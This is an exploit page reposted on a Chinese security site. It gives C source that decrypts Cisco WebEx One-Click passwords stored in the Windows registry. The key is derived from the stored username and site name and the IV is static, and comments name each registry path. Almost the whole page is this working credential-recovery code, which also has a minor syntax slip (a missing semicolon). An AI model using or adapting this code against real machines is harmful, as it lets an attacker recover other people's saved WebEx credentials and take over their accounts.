首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cisco WebEx One-Click Client Password Encryption Information Vulnerability
来源:vfocus.net 作者:Hakim 发布时间:2013-08-19  
#include <openssl/aes.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
  
unsigned char *
aes_ofb_encrypt(unsigned char * text, int length, unsigned char * key, unsigned char * iv)
{
        unsigned char * outbuf = calloc(1,length);
        int num = 0;
  
        unsigned char liv[16];
  
        memcpy(liv,iv,16);
  
        AES_KEY aeskey;
  
        //memset(outbuf, 0, 8);
  
        AES_set_encrypt_key(key, 256, &aeskey);
  
        AES_ofb128_encrypt(text, outbuf, length, &aeskey, liv, &num);
  
        return outbuf;
}
  
unsigned char *
aes_ofb_decrypt(unsigned char * enc, int length, unsigned char * key, unsigned char * iv)
{
        unsigned char * outbuf= calloc(1,length);
        int num = 0;
  
        unsigned char liv[16];
  
        memcpy(liv,iv,16);
  
        AES_KEY aeskey;
  
  
        AES_set_encrypt_key(key, 256, &aeskey);
  
        AES_ofb128_encrypt(enc, outbuf, length, &aeskey, liv, &num);
  
        return outbuf;
}
void main() {
    /*
        This value is from 
            HKEY_CURRENT_USER\Software\WebEx\ProdTools\Password
    */
    unsigned char * regVal = "\xcc\x6d\xc9\x3b\xa0\xcc\x4c\x76\x55\xc9\x3b\x9f";
    /*
        This value is from 
            HKEY_CURRENT_USER\Software\WebEx\ProdTools\PasswordLen
    */
    int regLength = 12; 
  
    /*
        This value is a combination of these two registry keys:
            HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName
            HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName
  
        Basicaly the username and the sitename padding to 32 characters, if the 
        two dont add up to 32 characters, its just repeated until it fits 
    */
    unsigned char key[32] = "braantonsiteaa.webex.com/siteaab"
  
    /*
        The IV is static, particularly complex value of 123456789abcdef....
    */
    unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };
  
    /* 
        These are just for testing, you'd probably not have the password :)
    */
    unsigned char * password = "bradbradbrad";
    int pwLength = strlen((char *)password);
  
    unsigned char * enc = NULL;
    unsigned char * enc2 = NULL;
    int i = 0;
  
      
    printf("Reg Key Value = ");
    enc = aes_ofb_encrypt(password, pwLength, key, iv);
    for(i=0;i<pwLength;i++) {
        printf("%02x ", enc[i]);
    }
    printf("\n");
  
    printf("Password = ");
    enc2 = aes_ofb_decrypt(regVal, regLength, key, iv);
    for(i=0;i<regLength;i++) {
        printf("%c", enc2[i]);
    }
    printf("\n");    
     
  
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Java storeImageArray() Invalid
·Cogent DataHub HTTP Server Buf
·Intrasrv 1.0 Buffer Overflow
·Mozilla Firefox 3.5.4 - Local
·MiniWeb (Build 300) Arbitrary
·Mozilla Firefox 3.6 - Integer
·Ultra Mini HTTPD Stack Buffer
·VLC Player 2.0.8 (.m3u) - Loca
·Chasys Draw IES Buffer Overflo
·PCMAN FTP 2.07 STOR Command -
·Joomla Media Manager File Uplo
·Graphite Web Unsafe Pickle Han
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved